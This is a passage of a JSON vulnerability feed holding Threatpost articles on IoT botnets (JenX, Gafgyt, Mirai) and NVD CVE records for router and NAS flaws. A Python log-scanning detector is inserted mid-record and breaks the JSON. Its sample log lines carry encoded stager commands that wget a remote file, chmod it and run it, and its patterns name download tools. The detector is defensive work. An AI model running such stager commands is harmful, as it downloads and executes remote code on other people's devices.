"2019-04-08T20:40:56", "id": "THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "href": "https://threatpost.com/new-mirai-samples-grow-the-number-of-processors-targets/143566/", "type": "threatpost", "title": "New Mirai Samples Grow the Number of Processor Targets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:47", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices.\n\nSatori is a derivative of Mirai, the notorious botnet that in 2016 infamously managed to take down Dyn, a DNS hosting provider that supports some of the world\u2019s largest 
websites.\n\nThe vulnerabilities in question are [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) and [CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>), which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens [said in a blog post](<https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/>).\n\nRadware\u2019s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee.\n\nEnthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or \u201cmods,\u201d in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own [custom versions of GTA](<https://www.gta5-mods.com/>) for multiplayer action.\n\n\u201cThe Corriente Divina (\u2018divine stream\u2019) option is described as \u2018God\u2019s wrath will be employed against the IP that you provide us,\u201d Geenens wrote of the site\u2019s DDoS offering. \u201cIt provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a \u2018Down OVH\u2019 option which most probably refers to attacks targeting the hosting service of [OVH](<https://www.ovh.com/>), a cloud hosting provider that also was a victim of the original [Mirai](<https://blog.radware.com/security/2016/10/busybox-botnet-mirai/>) attacks back in September 2016. 
OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.\u201d\n\nShortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. Now the listing included a reference to \u201cbots,\u201d and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop.\n\nWhile derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed \u201cJenX\u201d, is deployed in a different manner than its predecessors.\n\n\u201cUntypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,\u201d he wrote. \u201cNearly all botnets, including [Mirai](<https://blog.radware.com/security/2016/11/insight-into-mirais-source-code/>), [Hajime](<https://blog.radware.com/security/2017/04/hajime-futureproof-botnet/>), Persirai, [Reaper](<https://blog.radware.com/security/2017/10/iot_reaper-botnet/>), Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.\u201d\n\nThe centralized approach employed by JenX trades slower growth for lower detection, he added.\n\nThe danger from JenX should be mostly confined to GTA San Andreas users, Geenens said, but with a stern caveat.\n\n\u201c[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,\u201d he wrote. \u201cI cannot believe the San Calvicie group would oppose to it.\u201d\n\nRadware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet\u2019s server footprint, but it remains active. 
JenX\u2019s implementation makes taking it down a tricky task.\n\n\u201cAs they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,\u201d he wrote. \u201cThese providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers were moved to the Darknet, it would make it much more difficult to track down the servers\u2019 location and take them down.\u201d\n", "modified": "2018-02-02T13:32:17", "published": "2018-02-02T13:32:17", "id": "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "href": "https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/", "type": "threatpost", "title": "JenX Botnet Has Grand Theft Auto Hook", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-09T11:36:53", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2017-18368"], "description": "A new Gafgyt variant is adding vulnerable internet of things (IoT) devices to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nThe newly-discovered variant is capable of launching a variety of denial-of-service (DoS) attacks against the Valve Source Engine, a video game engine developed by Valve Corp. that runs popular games such as Half-Life and Team Fortress 2. 
Other gaming servers have also been targeted by the botnet, including those hosting widely played games such as Fortnite, researchers warn.\n\n\u201cThis Gafgyt variant is a competing botnet to the [JenX botnet](<https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/>), which also uses remote code-execution exploits to gain access and recruit routers into botnets to attack gaming servers \u2013 most notably those running the Valve Source Engine \u2013 and cause a denial-of-service,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 research team, in [analysis released Thursday](<https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/>). \u201cThis variant also competes against similar botnets, which we have found are frequently sold on Instagram.\u201d\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. The newest Gafgyt variant targets two of the same small-office router remote-code-execution flaws as its predecessor, JenX, which was disclosed in 2018.\n\nThe two previously-targeted flaws are CVE-2017-17215 (in the Huawei HG532) and CVE-2014-8361 (in the Realtek RTL81XX chipset). However, the newest variant also targets another vulnerability, CVE-2017-18368, a remote command-injection bug on Zyxel P660HN wireless routers. 
The Zyxel P660HN-T1A (distributed by TrueOnline) has a command-injection vulnerability in the remote system log forwarding function, which can be accessed by an unauthenticated user, researchers said.\n\nAccording to Shodan, there are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.\n\n## Infection and DoS\n\nThe Gafgyt variant first uses three \u201cscanners\u201d to attempt to exploit these known RCE flaws. Then, depending on the type of device targeted, the botnet makes the device download either an ARM7 or MIPS binary using \u201cwget,\u201d a command-line utility that pulls content from web servers.\n\nFrom there, the malware connects to a command-and-control (C2) server, sending the device\u2019s information, such as IP address and architecture, to join the botnet. Once enrolled, the victim device is forced to perform at least five different types of DoS attacks.\n\n\u201cThis Gafgyt variant can perform different types of DoS attacks simultaneously depending on the commands received from the C2 server,\u201d researchers said. \u201cThe main() function of the malware calls another function called processCmd() to process the command and initiate a corresponding attack.\u201d\n\nOne such attack calls the VSE function and contains a payload to attack game servers running the Valve Source Engine. Another calls the HTTPCF function to attack services secured by Cloudflare; still other options target devices that may have been previously infected with competing botnets; or, they can call the endHTTP() function to start an HTTP flooding attack.\n\n\u201cAs previously described, the VSE command starts an attack against gaming servers running the Valve Source Engine,\u201d researchers said. \u201cNote that this is not an attack on the Valve corporation itself because anyone can run a server for these games on their own network. 
It is an attack on the servers.\u201d\n\n## Instagram Distribution\n\nUpon further investigation, researchers found several fake Instagram profiles selling the source code for the botnet at a wide range of prices.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/30162826/instagram.png>)\n\nAfter going undercover and interacting with these profiles, researchers were offered a \u201cspot\u201d in the botnet servers from $8 to $150 USD. A \u201cspot\u201d means that a person can pay attackers to add a set of IP addresses against which their already-working botnets will launch a DoS attack, researchers said.\n\nResearchers say they contacted Instagram and alerted them of malicious profiles. Instagram did not respond to a request for comment from Threatpost.\n\nLooking forward, researchers said that the Gafgyt variant shows the dangers of insecure IoT devices.\n\n\u201cIn short, an increase of IoT botnets sold on Instagram + low cost + RCE exploits + the presence of wireless routers across all industries means that IoT devices are at increased risk of being recruited into botnets,\u201d said researchers. \u201cThis formula shows why every type of industry must be aware of IoT security and implement measures to prevent devices on their network from getting compromised and degrading business continuity.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "modified": "2019-10-31T13:00:43", "published": "2019-10-31T13:00:43", "id": "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "href": "https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/", "type": "threatpost", "title": "Valve Source Engine, Fortnite Servers Crippled By Gafgyt Variant", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:17:10", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look on the html source code of login page, few variables are declared. One of the variables contain a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. 
\u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much more favored than using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) (MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. 
Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "modified": "2018-12-20T20:41:46", "published": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T13:53:14", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2018-10561", "CVE-2021-24027"], "description": "Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.\n\nGafgyt (a.k.a. Bashlite) is a [botnet that was first uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>). It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe latest variants have now incorporated several Mirai-based modules, according to research from Uptycs [released Thursday](<https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt>), along with new exploits. 
Mirai variants, and re-use of its code, have multiplied since the source code for the IoT botnet [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\nThe capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:\n\n * HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;\n * UDP flooding, where the botnet sends a high volume of UDP packets to a victim server as a means of exhausting it;\n * Various TCP flood attacks, which abuse the normal three-way TCP handshake so that the victim server receives a heavy number of connection requests and becomes unresponsive;\n * And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.\n\nCode comparison for the HTTP DDoS module between Gafgyt and Mirai. Source: Uptycs.\n\nMeanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.\n\nThe Huawei exploit ([CVE-2017-17215](<https://nvd.nist.gov/vuln/detail/CVE-2017-17215>)) and the Realtek exploit ([CVE-2014-8361](<https://nvd.nist.gov/vuln/detail/CVE-2014-8361>)) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.\n\n\u201cThe Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using \u2018wget\u2019 command, fetches the payload,\u201d according to Uptycs. 
\u201c[It] gives the execution permission to payload using \u2018chmod\u2019 command, [and] executes the payload.\u201d\n\nThe GPON exploit ([CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>)) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.\n\n\u201cThe IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,\u201d researchers added.\n\n## **IoT Botnet Variants Abound**\n\nIoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family [to cloak its activity](<https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/>) using the Tor network.\n\nMirai hasn\u2019t disappeared either: a [new variant of the botnet](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet.\n\nIt\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>). 
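Both Gafgyt write-ups above (the Unit 42 analysis of the gaming-server variant and the Uptycs analysis of the Mirai code re-use) describe the same delivery chain: the exploit request carries a shell stager that uses wget to fetch an architecture-specific binary, chmod to make it executable, and then runs it. The detector below is an added example, not Unit 42 or Uptycs code. It URL-decodes web-server request lines (repeatedly, since stagers are often double-encoded) and scores them for that fetch/chmod/execute pattern. The log lines are constructed for the example in combined log format with an assumed trailing quoted body field and TEST-NET addresses; the `/diag.cgi` and `/cgi-bin/ping` endpoints are invented placeholders, not the real exploit paths for any CVE on this page.

```python
"""Score web-server request lines for an IoT-botnet stager (fetch, chmod, run).

Added example, not Unit 42 or Uptycs code. Log format, endpoints and
addresses are constructed for the demonstration.
"""
import re
from urllib.parse import unquote

# Components of the fetch -> chmod -> execute chain carried in exploit requests.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.IGNORECASE)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b", re.IGNORECASE)
EXEC_RE = re.compile(r"(?:;|&&|\|\|?|\n)\s*(?:(?:sh|bash)\b|\./[\w.-]+)", re.IGNORECASE)
TMPDIR_RE = re.compile(r"\bcd\s+/(?:tmp|var/run|dev/shm|mnt)\b", re.IGNORECASE)
SHELL_META = re.compile(r"[;|`$&]")

# Combined log format plus an assumed optional trailing quoted request body.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>.*)")?$'
)


def decode_layers(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly; stagers are often double-encoded to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def score_stager(text: str) -> tuple:
    """Return (score, reasons) for decoded request text; 3 or more is a confident hit."""
    reasons = []
    for label, pattern in (("fetch", FETCH_RE), ("chmod", CHMOD_RE),
                           ("exec", EXEC_RE), ("tmpdir", TMPDIR_RE)):
        if pattern.search(text):
            reasons.append(label)
    # Shell metacharacters only count alongside at least one stager component,
    # so a documentation URL that merely mentions wget does not trip the rule.
    if reasons and SHELL_META.search(text):
        reasons.append("shell-meta")
    return len(reasons), reasons


def scan_log(lines, threshold: int = 3) -> list:
    """Parse log lines and return hits as dicts with source, URI, score and reasons."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        decoded = decode_layers(match["uri"] + " " + (match["body"] or ""))
        score, reasons = score_stager(decoded)
        if score >= threshold:
            hits.append({"src": match["src"], "method": match["method"],
                         "uri": match["uri"], "score": score, "reasons": reasons})
    return hits


# Constructed sample: two benign requests, one single-encoded POST stager, one
# double-encoded GET stager. Endpoints and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.9 - - [16/Feb/2021:09:58:11 +0000] "GET /index.html HTTP/1.1" 200 1834',
    '203.0.113.9 - - [16/Feb/2021:09:58:12 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Feb/2021:10:01:02 +0000] "POST /diag.cgi HTTP/1.1" 200 0 '
    '"host=127.0.0.1%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.5%2Fx.sh%3Bchmod%20777%20x.sh%3Bsh%20x.sh"',
    '198.51.100.23 - - [16/Feb/2021:10:04:40 +0000] "GET /cgi-bin/ping?ip=%2524%2528cd%2520%252Ftmp%253Bwget'
    '%2520http%253A%252F%252F203.0.113.5%252Fbot.arm7%253Bchmod%2520%252Bx%2520bot.arm7%253B.%252Fbot.arm7%2529 HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], hit["method"], hit["uri"][:40], hit["score"], ",".join(hit["reasons"]))
```

The score is deliberately additive rather than a single regex: a 404 on the exploit path still records the attempt, and an attacker who drops chmod (for example by piping straight into sh) still matches on fetch, exec and the metacharacters.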
Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.\n\n\u201cMalware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,\u201d Uptycs researchers said.\n\nTo protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "modified": "2021-04-15T16:35:53", "published": "2021-04-15T16:35:53", "id": "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "href": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/", "type": "threatpost", "title": "Gafgyt Botnet Lifts DDoS Tricks from Mirai", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-12T14:58:56", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. 
The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "title": "CVE-2021-22502", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-11T18:50:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2021-22502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-05T14:32:54", "description": "D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-02T13:15:00", "title": "CVE-2020-25506", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-02-04T21:40:00", "cpe": ["cpe:/o:dlink:dns-320_firmware:2.06b01"], "id": "CVE-2020-25506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:57", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. 
After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.", "edition": 8, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-07T23:15:00", "title": "CVE-2019-19356", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2020-02-14T17:15:00", "cpe": ["cpe:/o:netis-systems:wf2419_firmware:2.2.36123", "cpe:/o:netis-systems:wf2419_firmware:1.2.31805"], "id": "CVE-2019-19356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19356", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:netis-systems:wf2419_firmware:2.2.36123:*:*:*:*:*:*:*", "cpe:2.3:o:netis-systems:wf2419_firmware:1.2.31805:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:37:04", "description": "NETGEAR JGS516PE devices before 2.6.0.43 are affected by lack of access control at the function level.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-09T07:15:00", "title": "CVE-2020-26919", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2020-10-19T14:23:00", "cpe": [], "id": "CVE-2020-26919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26919", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-04-09T10:50:58", "description": "The miniigd SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.", "edition": 10, "cvss3": {}, "published": "2015-05-01T15:59:00", "title": "CVE-2014-8361", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
